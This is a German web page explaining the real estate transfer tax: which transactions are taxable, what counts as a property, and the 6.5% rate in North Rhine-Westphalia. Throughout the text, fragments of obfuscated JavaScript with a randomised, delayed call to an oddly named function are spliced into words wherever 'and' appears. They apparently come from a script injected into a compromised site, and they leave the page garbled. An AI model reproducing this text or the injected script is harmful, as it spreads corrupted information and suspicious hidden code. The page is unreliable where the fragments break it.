Grunderwerbsteuer

 

Grunderwerbsteuer

 

Welche Vorgänge unterliegen der Grunderwerbsteuer?

Der Grunderwerbsteuer unterliegen nach § 1 Grunderwerbsteuergesetzt (GrEStG) unter andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}anderem folgende Rechtsvorgänge, soweit sie sich auf inländische Grundstücke beziehen:

  • Kaufverträge/Tauschverträge über unbebaute oder bebaute Grundstücke,
  • Grundstücksschenkungen,
  • Meistgebot im Zwangsversteigerungsverfahren,
  • sonstige Rechtsvorgänge, die sich auf die Übertragung eines Grundstücks beziehen. Eine Definition des Grundstücksbegriffs ergibt sich aus § 2 GrEStG. Demnach handom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andelt es sich in den nachfolgenden Fällen um Grundstücke:
  • Was gilt als Grundstück im Sinne des Grunderwerbsteuergesetz?
  • Grundstücke im Sinne des Bürgerlichen Gesetzbuch,
  • Bruchteilseigentum an Grundstücken,
  • Grundstücksgleiche Rechte (z. B. Erbbaurechte) sowie
  • Wohnungs- und Teileigentum (Eigentumswohnungen).
  • Nicht zu den Grundstücken gehören:
  • Betriebsvorrichtungen,
  • Recht des Grundstückseigentümers auf den Erbbauzins bei Erwerb eines mit einem Erbbaurecht belasteten Grundstücks,
  • Inventar, Zubehör und
  • die Instandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andhaltungsrücklage.
  • Wie hoch ist die Grunderwerbsteuer?
  • Die Höhe der Grunderwerbsteuersätze unterscheidet sich von Bundeslandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and zu Bundeslandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and. Die Grunderwerbsteuer beträgt im Landom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and Nordrhein-Westfalen 6,5 % der Bemessungsgrundlage. Das gilt für alle Verträge, die ab dem 1. Januar 2015 beurkundet worden sind.

 

Quelle: www.finanzverwaltung.nrw.de, 11.08.2016

 

 

No comments yet.

Schreibe einen Kommentar